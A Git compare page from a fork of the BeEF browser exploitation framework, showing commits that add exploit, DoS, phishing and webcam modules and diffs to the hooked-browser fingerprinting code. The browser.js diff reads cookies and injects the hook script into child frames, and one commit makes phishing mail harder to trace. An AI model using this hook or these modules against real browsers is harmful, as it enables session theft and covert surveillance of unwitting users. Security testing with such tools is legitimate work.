Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Hiddenden:beef-0.4.4.3
Branches Tags
Hiddenden:master Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1
..
compare: Hiddenden:beef-0.4.4.5
Branches Tags
Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:master Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1

76 Commits
beef-0.4.4 ... beef-0.4.4

Author SHA1 Message Date
Michele Orru
71f04d82f5 Merge pull request #849 from geefunkmasterpro/master 
Enhancements to Mass Mailer
 2013-05-26 04:58:57 -07:00
bcoles
704b979054 minor syntax changes to php-5.3.9-dos module 2013-05-26 02:48:04 +09:30
bcoles
7aaafc79aa Remove bi-directional communication from IPEC win bindshell module 2013-05-26 02:41:04 +09:30
bcoles
f90ad4a261 Add detection for WebRTC support 2013-05-24 17:06:36 +09:30
bcoles
0dfab0e348 Add EXTRAnet Collaboration Tool Command Execution exploit module 2013-05-24 16:40:02 +09:30
bcoles
018a849e14 Add 'path' argument for beef.dom.createIframeIpecForm() 2013-05-24 14:01:21 +09:30
bcoles
717f63ff0c Add ruby-nntpd Command Execution exploit module 2013-05-24 13:50:04 +09:30
bcoles
9bac6b4fc1 Add support for Firefox 21 2013-05-24 13:47:31 +09:30
bcoles
2dae1d4c07 Add /bin/sh -c to default command 2013-05-22 14:37:01 +09:30
bcoles
7de48ceafb Add GroovyShell Server Command Execution IPEC exploit module 2013-05-22 02:32:27 +09:30
Brendan Coles
8ecdceb928 Merge pull request #894 from sgorbaty/master 
New functionality - detect phonegap plugins
 2013-05-09 01:59:49 -07:00
Sergey Gorbaty
498372aef3 Adding phonegap integration with keychain plugin 2013-05-08 13:18:31 -07:00
Sergey Gorbaty
55d8506960 Added primitive phonegap plugin detection 2013-05-07 17:10:12 -07:00
antisnatchor
8d60c10298 Merge branch 'master' of https://github.com/beefproject/beef 2013-05-07 13:04:19 +02:00
antisnatchor
94d15cd386 Added DOS module which allows you to send multiple GET or POST requests to a target, from a WebWorker in order to don't slow down the whole browser. 2013-05-07 13:00:34 +02:00
bcoles
5bbf26abac Add beef.http.dns_port config option 2013-05-06 16:03:17 +09:30
Brendan Coles
5b90c351da Merge pull request #888 from sgorbaty/master 
Adding new features to Phonegap module
 2013-05-05 17:26:31 -07:00
antisnatchor
b501fe7c1a Updated Rack dependency in Gemfile in order to don't create conflicts with the updated Sinatra dependency. 2013-05-04 09:42:40 +01:00
Michele Orru
b28e631500 Merge pull request #889 from 0x1a0ran/master 
Bug fix: cross-origin XHR with "Origin" or "Referrer" header set always return 403.
 2013-05-04 01:30:42 -07:00
Sergey Gorbaty
5722cb2bc1 Added email to contact list 2013-05-03 14:24:23 -07:00
Sergey Gorbaty
0479744dfc added device model detection 2013-05-03 14:14:19 -07:00
Sergey Gorbaty
3dbfdbac7e Adding user prompt 2013-05-03 14:02:53 -07:00
Sergey Gorbaty
d3262d9451 Adding local detection 2013-05-03 13:34:09 -07:00
Sergey Gorbaty
906ca6ccce Cordova detection added 2013-05-03 13:13:24 -07:00
Xiaoran Wang
ea560c3464 Added configurable port for postsql and mysql 2013-05-03 13:01:37 -07:00
Xiaoran Wang
b79402ce5f updated sinatra from 1.3.2 to 1.4.2 to fix the CORS request always return a 403 bug. link here https://github.com/sinatra/sinatra/issues/518 2013-05-03 11:02:11 -07:00
Sergey Gorbaty
1699d52475 adding contact list 2013-05-03 10:09:09 -07:00
antisnatchor
c5d5b99472 Issue #886: The preflight OPTIONS request now allow also the content-type header, required to use a json conten-type with POST requests. 2013-05-02 10:55:16 +01:00
antisnatchor
9915547b19 Issue #886: Added support for preflight OPTIONS request. 2013-05-01 17:19:48 +01:00
antisnatchor
ef2eac26eb Issue #886: Added support for CORS on the Router object. The RESTful aPI can not be called from JS x-domain. 2013-05-01 11:15:21 +01:00
bcoles
09be2db069 Update version to beef-0.4.4.5 2013-05-01 17:53:21 +09:30
bcoles
6da4e2c39c Update version to '0.4.4.4.1-alpha' bug fix edition 2013-05-01 17:49:21 +09:30
bcoles
15c7e64e93 Fix bug with module image result rendering in admin UI 2013-05-01 17:47:00 +09:30
bcoles
91e2b36ce4 Update webcam module so the picture returned as a base64 encoded string 
will be rendered in the admin UI
 2013-05-01 16:44:28 +09:30
bcoles
b82696ead2 Enabled web server imitation by default 
The time has come. This feature has been stable for a while.
 2013-05-01 16:43:26 +09:30
bcoles
7233957664 Update version 2013-04-30 18:56:37 +09:30
bcoles
88678f986c Add 'Debug -> Test Return Image' module 
Part of isse #883
 2013-04-30 18:40:25 +09:30
bcoles
719bb4a20b Fixed malformed YAML in modules/browser/get_visited_domains/config.yaml 2013-04-25 01:37:15 +09:30
antisnatchor
4ea18852f6 Updated eventmachine gem version in Gemfile. 2013-04-21 10:52:46 +01:00
qswain2
c16479a14e Add chrome support to get_visited_domains 
Added chrme implementation based on visipisi
 2013-04-19 01:02:48 -04:00
bcoles
59951959f1 Add Opencart password reset CSRF module 
This module hasn't been tested against an Opencart instance
 2013-04-19 09:18:05 +09:30
bcoles
da763df110 Uncommented several instances of beef.debug() - Part of issue #862 2013-04-17 22:12:35 +09:30
bcoles
4980ca02a6 Add beef.client.debug config property - Part of issue #862 
Client-side debugging is disabled by default

`beef.debug()` now only shows messages if `beef.client.debug` is true
 2013-04-17 22:05:31 +09:30
Christian Frichot
6e0f7a266e Issue #883. Admin UI will inline display images from the HTML5 webcam module now 2013-04-15 19:28:52 +08:00
Christian Frichot
e3cb7f7a2d #882. New HTML5 WebRTC Webcam Module 2013-04-15 19:20:48 +08:00
Christian Frichot
6e9db43463 Fixes issue #881. Console fix for reviewing previous responses 2013-04-15 19:18:07 +08:00
bcoles
a172362452 Part of issue #862 - Add beef.debug() for client-side debugging 
Add `beef.debug()` function - wraps `console.log()`

Debug messages are suppressed for browsers which don't support `console.log()`

Update './core/*' to use `beef.debug()` instead of `console.log()`
Update './modules/*' to use `beef.debug()` instead of `console.log()`
Update './extensions/*' to use `beef.debug()` instead of `console.log()`

Add 'modules/debug/test_beef_debug/' module
 2013-04-15 16:49:01 +09:30
bcoles
55b0bee9ca Re-enable XSS-Rays vectors containing ' charater 
Fix issue #47
 2013-04-14 20:38:41 +09:30
Christian Frichot
950c3d37a7 Fixes Issue #880. Detect Tor update - now works 2013-04-13 14:51:34 +08:00
Christian Frichot
1721d3c263 Fixes issue #879. Console enhancements. 2013-04-13 14:48:40 +08:00
antisnatchor
5585879cca Updated multiple core files to use hook_session_name consistently from the config.yaml file. 2013-04-09 10:25:49 +01:00
Christian Frichot
d855100ac9 Fixes #878 and #758. 2013-04-08 21:52:50 +08:00
Christian Frichot
fad33dfea7 Fixes #877. New IE Fake Notification Bar Module 2013-04-08 19:36:02 +08:00
Christian Frichot
b4732a9438 Fixes #876. Can detect Chrome 26. 2013-04-08 13:08:56 +08:00
antisnatchor
73e291832e Replacing document.location.href with location in xssrays.js. 2013-04-07 15:54:14 +01:00
antisnatchor
85b204f52b Updated beef.hardware component name for consistency. 2013-04-07 13:19:23 +01:00
antisnatchor
78410e28eb Changed attachApplet dom.js method to use <applet> also for Firefox, instead of the <embed> tag. This fixes some issues when running Signed Applets. 2013-04-06 12:30:00 +01:00
antisnatchor
222cff3f1d Added a README file for the JavaPaylod signed applet exploit. 2013-04-06 12:29:05 +01:00
Christian Frichot
2ef1b5bab8 Updates gmail phishing command module. Fixes #873 2013-04-06 15:54:55 +08:00
Christian Frichot
af67c6a8d9 Few enhancements to dom.js. See #870 #871 #872 2013-04-06 15:52:32 +08:00
Christian Frichot
79572a61f0 Renamed webcam_permission_check module 2013-04-06 14:35:21 +08:00
Christian Frichot
2fcdf1038d xntriks updates to webcam_perm_check 2013-04-06 14:32:51 +08:00
Christian Frichot
cca21f1003 Merge pull request #869 from bw-z/master 
Added Webcam Permission Check Module - which I'll then update.
 2013-04-05 23:29:21 -07:00
Christian Frichot
07fe3a9c0e Updates to tabnabbing module to use jQuerys wider event handling. #868 2013-04-04 21:33:43 +08:00
Christian Frichot
69fd3e600c Event log now logs when a zombie comes back online. #867 2013-04-04 21:29:18 +08:00
Christian Frichot
ae98842ad4 Tiny fix to Clippy so it appears properly. #866 2013-04-04 19:37:08 +08:00
bcoles
159ecb5ade Fix malformed YAML in 'deface_web_page_component' module 2013-04-04 00:04:45 +10:30
BWZ
cf4ab9533e Added Webcam Permission Check Module 2013-04-03 09:01:15 +10:00
Christian Frichot
9a23ed758e New getHighestZindex function in beef.dom and updated createIframe beef.dom function. #865 2013-04-02 14:33:57 +08:00
Christian Frichot
389f27360d Slight spelling mistake fix up in the Welcome tab of the Admin UI 2013-04-01 19:51:16 +08:00
Christian Frichot
e8eda3ef99 Minor enhancements to the Admin UI. #864 2013-04-01 11:07:50 +08:00
Saafan
af8018500b Fixing some unit tests 2013-03-31 16:22:58 +02:00
Christian Frichot
22cd68101d Added Bookmarklet to the Welcome Tab in the Admin UI. #863 2013-03-30 17:31:36 +08:00
bcoles
760e7a456e Update version 2013-03-29 15:59:48 +10:30
geefunkmasterpro
66d0e3535b Added fromaddr to mass mailer JSON interface so emails can be sent from 
any address without restart.

Removed fromaddr entry from config.yaml.
 2013-02-27 23:29:08 +11:00
geefunkmasterpro
e79372f8ac Added auth field to config so that emails are harder to track to sender 
Added error handling to identify:
  - errors creating the mail headers
  - errors processing JSON input
  - errors in the mailer configuration
 2013-02-27 21:33:48 +11:00
117 changed files with 2266 additions and 394 deletions
Expand all files Collapse all files

7
Gemfile
View File

@@ -9,13 +9,12 @@
# Gems only required on Windows, or with specific Windows issues # Gems only required on Windows, or with specific Windows issues
if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw") if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
gem "win32console" gem "win32console"
gem "eventmachine", "1.0.0.beta.4.1"
else
gem "eventmachine", "0.12.10"
end end
gem "eventmachine", "1.0.3"
gem "thin" gem "thin"
gem "sinatra", "1.3.2" gem "sinatra", "1.4.2"
gem "rack", "1.5.2"
gem "em-websocket", "~> 0.3.6" gem "em-websocket", "~> 0.3.6"
gem "jsmin", "~> 1.0.1" gem "jsmin", "~> 1.0.1"
gem "ansi" gem "ansi"

6
Rakefile
View File

@@ -76,10 +76,10 @@ end
@beef_process_id = nil; @beef_process_id = nil;
task :beef_start => 'beef' do task :beef_start => 'beef' do
printf "Starting BeEF (wait 10 seconds)..." printf "Starting BeEF (wait a few seconds)..."
@beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+") @beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05] delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
delays.each do |i| # delay for 10 seconds delays.each do |i| # delay for a few seconds
printf '.' printf '.'
sleep (i) sleep (i)
end end

2
VERSION
View File

@@ -4,4 +4,4 @@
# See the file 'doc/COPYING' for copying permission # See the file 'doc/COPYING' for copying permission
# #
0.4.4.3-alpha 0.4.4.5-alpha

1
beef
View File

@@ -75,6 +75,7 @@ case config.get("beef.database.driver")
DataMapper.setup(:default, DataMapper.setup(:default,
:adapter => config.get("beef.database.driver"), :adapter => config.get("beef.database.driver"),
:host => config.get("beef.database.db_host"), :host => config.get("beef.database.db_host"),
:port => config.get("beef.database.db_port"),
:username => config.get("beef.database.db_user"), :username => config.get("beef.database.db_user"),
:password => config.get("beef.database.db_passwd"), :password => config.get("beef.database.db_passwd"),
:database => config.get("beef.database.db_name"), :database => config.get("beef.database.db_name"),

21
config.yaml
View File

@@ -6,7 +6,7 @@
# BeEF Configuration file # BeEF Configuration file
beef: beef:
version: '0.4.4.3-alpha' version: '0.4.4.5-alpha'
debug: false debug: false
restrictions: restrictions:
@@ -27,12 +27,20 @@ beef:
# if running behind a nat set the public ip address here # if running behind a nat set the public ip address here
#public: "" #public: ""
#public_port: "" # port setting is experimental #public_port: "" # port setting is experimental
dns: "localhost" # DNS
dns_host: "localhost"
dns_port: 53
panel_path: "/ui/panel" panel_path: "/ui/panel"
hook_file: "/hook.js" hook_file: "/hook.js"
hook_session_name: "BEEFHOOK" hook_session_name: "BEEFHOOK"
session_cookie_name: "BEEFSESSION" session_cookie_name: "BEEFSESSION"
# Allow one or multiple domains to access the RESTful API using CORS
# For multiple domains use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible. # Prefer WebSockets over XHR-polling when possible.
websocket: websocket:
enable: false enable: false
@@ -43,14 +51,14 @@ beef:
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header) # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation: web_server_imitation:
enable: false enable: true
type: "apache" #supported: apache, iis type: "apache" #supported: apache, iis
# Experimental HTTPS support for the hook / admin / all other Thin managed web services # Experimental HTTPS support for the hook / admin / all other Thin managed web services
https: https:
enable: false enable: false
# In production environments, be sure to use a valid certificate signed for the value # In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.dns (the domain name of the server where you run BeEF) # used in beef.http.dns_host (the domain name of the server where you run BeEF)
key: "beef_key.pem" key: "beef_key.pem"
cert: "beef_cert.pem" cert: "beef_cert.pem"
@@ -72,6 +80,7 @@ beef:
# db connection information is only used for mysql/postgres # db connection information is only used for mysql/postgres
db_host: "localhost" db_host: "localhost"
db_port: 5432
db_name: "beef" db_name: "beef"
db_user: "beef" db_user: "beef"
db_passwd: "beef123" db_passwd: "beef123"
@@ -91,6 +100,10 @@ beef:
crypto_default_value_length: 80 crypto_default_value_length: 80
# Enable client-side debugging
client:
debug: false
# You may override default extension configuration parameters here # You may override default extension configuration parameters here
extension: extension:
requester: requester:

16
core/main/client/beef.js
View File

@@ -31,7 +31,21 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
// An array containing all the BeEF JS components. // An array containing all the BeEF JS components.
components: new Array(), components: new Array(),
/**
* Adds a function to display debug messages (wraps console.log())
* @param: {string} the debug string to return
*/
debug: function(msg) {
if (!<%= @client_debug %>) return;
if (typeof console == "object" && typeof console.log == "function") {
console.log(msg);
} else {
// TODO: maybe add a callback to BeEF server for debugging purposes
//window.alert(msg);
}
},
/** /**
* Adds a function to execute. * Adds a function to execute.
* @param: {Function} the function to execute. * @param: {Function} the function to execute.

154
core/main/client/browser.js
View File

@@ -236,12 +236,20 @@ beef.browser = {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/20\./) != null; return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/20\./) != null;
}, },
/**
* Returns true if FF21
* @example: beef.browser.isFF21()
*/
isFF21:function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/21\./) != null;
},
/** /**
* Returns true if FF. * Returns true if FF.
* @example: beef.browser.isFF() * @example: beef.browser.isFF()
*/ */
isFF:function () { isFF:function () {
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20(); return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21();
}, },
/** /**
@@ -444,12 +452,20 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false); return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false);
}, },
/**
* Returns true if Chrome 26.
* @example: beef.browser.isC26()
*/
isC26:function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 26) ? true : false);
},
/** /**
* Returns true if Chrome. * Returns true if Chrome.
* @example: beef.browser.isC() * @example: beef.browser.isC()
*/ */
isC:function () { isC:function () {
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24() || this.isC25(); return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24() || this.isC25() || this.isC26();
}, },
/** /**
@@ -530,6 +546,7 @@ beef.browser = {
C23:this.isC23(), // Chrome 23 C23:this.isC23(), // Chrome 23
C24:this.isC24(), // Chrome 24 C24:this.isC24(), // Chrome 24
C25:this.isC25(), // Chrome 25 C25:this.isC25(), // Chrome 25
C26:this.isC26(), // Chrome 26
C:this.isC(), // Chrome any version C:this.isC(), // Chrome any version
FF2:this.isFF2(), // Firefox 2 FF2:this.isFF2(), // Firefox 2
@@ -552,7 +569,8 @@ beef.browser = {
FF17:this.isFF17(), // Firefox 17 FF17:this.isFF17(), // Firefox 17
FF18:this.isFF18(), // Firefox 18 FF18:this.isFF18(), // Firefox 18
FF19:this.isFF19(), // Firefox 19 FF19:this.isFF19(), // Firefox 19
FF20:this.isFF20(), // Firefox 20 FF20:this.isFF20(), // Firefox 20
FF21:this.isFF21(), // Firefox 21
FF:this.isFF(), // Firefox any version FF:this.isFF(), // Firefox any version
IE6:this.isIE6(), // Internet Explorer 6 IE6:this.isIE6(), // Internet Explorer 6
@@ -667,7 +685,11 @@ beef.browser = {
if (this.isC25()) { if (this.isC25()) {
return '25' return '25'
} }
; ; // Chrome 25
if (this.isC26()) {
return '26'
}
; // Chrome 26
if (this.isFF2()) { if (this.isFF2()) {
return '2' return '2'
} }
@@ -748,10 +770,14 @@ beef.browser = {
return '19' return '19'
} }
; // Firefox 19 ; // Firefox 19
if (this.isFF20()) { if (this.isFF20()) {
return '20' return '20'
} }
; // Firefox 20 ; // Firefox 20
if (this.isFF21()) {
return '21'
}
; // Firefox 21
if (this.isIE6()) { if (this.isIE6()) {
return '6' return '6'
@@ -858,10 +884,10 @@ beef.browser = {
try { try {
// append hook script // append hook script
self.frames[i].document.body.appendChild(script); self.frames[i].document.body.appendChild(script);
//console.log("Hooked child frame [src:"+self.frames[i].window.location.href+"]"); beef.debug("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
} catch (e) { } catch (e) {
// warn on cross-domain // warn on cross-domain
//console.log("Hooking frame failed"); beef.debug("Hooking frame failed");
} }
} }
}, },
@@ -1069,8 +1095,9 @@ beef.browser = {
*/ */
hasPhonegap:function () { hasPhonegap:function () {
var result = false; var result = false;
try { try {
if (!!device.phonegap) result = true; else result = false; if (!!device.phonegap || !!device.cordova) result = true; else result = false;
} }
catch (e) { catch (e) {
result = false; result = false;
@@ -1436,63 +1463,64 @@ beef.browser = {
getDetails:function () { getDetails:function () {
var details = new Array(); var details = new Array();
var browser_name = beef.browser.getBrowserName(); var browser_name = beef.browser.getBrowserName();
var browser_version = beef.browser.getBrowserVersion(); var browser_version = beef.browser.getBrowserVersion();
var browser_reported_name = beef.browser.getBrowserReportedName(); var browser_reported_name = beef.browser.getBrowserReportedName();
var page_title = (document.title) ? document.title : "Unknown"; var page_title = (document.title) ? document.title : "Unknown";
var page_uri = document.location.href; var page_uri = (document.location.href) ? document.location.href : "Unknown";
var page_referrer = (document.referrer) ? document.referrer : "Unknown"; var page_referrer = (document.referrer) ? document.referrer : "Unknown";
var hostname = document.location.hostname; var hostname = (document.location.hostname) ? document.location.hostname : "Unknown";
var hostport = (document.location.port) ? document.location.port : "80"; var hostport = (document.location.port) ? document.location.port : "80";
var browser_plugins = beef.browser.getPlugins(); var browser_plugins = beef.browser.getPlugins();
var date_stamp = new Date().toString(); var date_stamp = new Date().toString();
var os_name = beef.os.getName(); var os_name = beef.os.getName();
var hw_name = beef.hardware.getName(); var hw_name = beef.hardware.getName();
var cpu_type = beef.hardware.cpuType(); var cpu_type = beef.hardware.cpuType();
var touch_enabled = (beef.hardware.isTouchEnabled()) ? "Yes" : "No"; var touch_enabled = (beef.hardware.isTouchEnabled()) ? "Yes" : "No";
var browser_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null; var browser_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
var browser_type = JSON.stringify(beef.browser.type(), function (key, value) { var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {
if (value == true) return value; else if (typeof value == 'object') return value; else return; if (value == true) return value; else if (typeof value == 'object') return value; else return;
}); });
var screen_size = beef.browser.getScreenSize(); var screen_size = beef.browser.getScreenSize();
var window_size = beef.browser.getWindowSize(); var window_size = beef.browser.getWindowSize();
var java_enabled = (beef.browser.javaEnabled()) ? "Yes" : "No"; var java_enabled = (beef.browser.javaEnabled()) ? "Yes" : "No";
var vbscript_enabled = (beef.browser.hasVBScript()) ? "Yes" : "No"; var vbscript_enabled = (beef.browser.hasVBScript()) ? "Yes" : "No";
var has_flash = (beef.browser.hasFlash()) ? "Yes" : "No"; var has_flash = (beef.browser.hasFlash()) ? "Yes" : "No";
var has_phonegap = (beef.browser.hasPhonegap()) ? "Yes" : "No"; var has_phonegap = (beef.browser.hasPhonegap()) ? "Yes" : "No";
var has_googlegears = (beef.browser.hasGoogleGears()) ? "Yes" : "No"; var has_googlegears = (beef.browser.hasGoogleGears()) ? "Yes" : "No";
var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No"; var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No";
var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No"; var has_webrtc = (beef.browser.hasWebRTC()) ? "Yes" : "No";
var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No"; var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No"; var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No"; var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No"; var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
var has_vlc = (beef.browser.hasVLC()) ? "Yes" : "No"; var has_wmp = (beef.browser.hasWMP()) ? "Yes" : "No";
var has_foxit = (beef.browser.hasFoxit()) ? "Yes" : "No"; var has_vlc = (beef.browser.hasVLC()) ? "Yes" : "No";
var has_foxit = (beef.browser.hasFoxit()) ? "Yes" : "No";
try{ try{
var cookies = document.cookie; var cookies = document.cookie;
var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No"; var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No"; var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies("cookie")) ? "Yes" : "No";
if (cookies) details["Cookies"] = cookies; if (cookies) details['Cookies'] = cookies;
if (has_session_cookies) details["hasSessionCookies"] = has_session_cookies; if (has_session_cookies) details['hasSessionCookies'] = has_session_cookies;
if (has_persistent_cookies) details["hasPersistentCookies"] = has_persistent_cookies; if (has_persistent_cookies) details['hasPersistentCookies'] = has_persistent_cookies;
}catch(e){ }catch(e){
// the hooked domain is using HttpOnly. EverCookie is persisting the BeEF hook in a different way, // the hooked domain is using HttpOnly. EverCookie is persisting the BeEF hook in a different way,
// and there is no reason to read cookies at this point // and there is no reason to read cookies at this point
details["Cookies"] = "Cookies can't be read. The hooked domain is most probably using HttpOnly."; details['Cookies'] = "Cookies can't be read. The hooked domain is most probably using HttpOnly.";
details["hasSessionCookies"] = "No"; details['hasSessionCookies'] = "No";
details["hasPersistentCookies"] = "No"; details['hasPersistentCookies'] = "No";
} }
if (browser_name) details["BrowserName"] = browser_name; if (browser_name) details['BrowserName'] = browser_name;
if (browser_version) details["BrowserVersion"] = browser_version; if (browser_version) details['BrowserVersion'] = browser_version;
if (browser_reported_name) details["BrowserReportedName"] = browser_reported_name; if (browser_reported_name) details['BrowserReportedName'] = browser_reported_name;
if (page_title) details["PageTitle"] = page_title; if (page_title) details['PageTitle'] = page_title;
if (page_uri) details["PageURI"] = page_uri; if (page_uri) details['PageURI'] = page_uri;
if (page_referrer) details["PageReferrer"] = page_referrer; if (page_referrer) details['PageReferrer'] = page_referrer;
if (hostname) details["HostName"] = hostname; if (hostname) details['HostName'] = hostname;
if (hostport) details["HostPort"] = hostport; if (hostport) details['HostPort'] = hostport;
if (browser_plugins) details["BrowserPlugins"] = browser_plugins; if (browser_plugins) details['BrowserPlugins'] = browser_plugins;
if (os_name) details['OsName'] = os_name; if (os_name) details['OsName'] = os_name;
if (hw_name) details['Hardware'] = hw_name; if (hw_name) details['Hardware'] = hw_name;
if (cpu_type) details['CPU'] = cpu_type; if (cpu_type) details['CPU'] = cpu_type;
@@ -1503,11 +1531,12 @@ beef.browser = {
if (screen_size) details['ScreenSize'] = screen_size; if (screen_size) details['ScreenSize'] = screen_size;
if (window_size) details['WindowSize'] = window_size; if (window_size) details['WindowSize'] = window_size;
if (java_enabled) details['JavaEnabled'] = java_enabled; if (java_enabled) details['JavaEnabled'] = java_enabled;
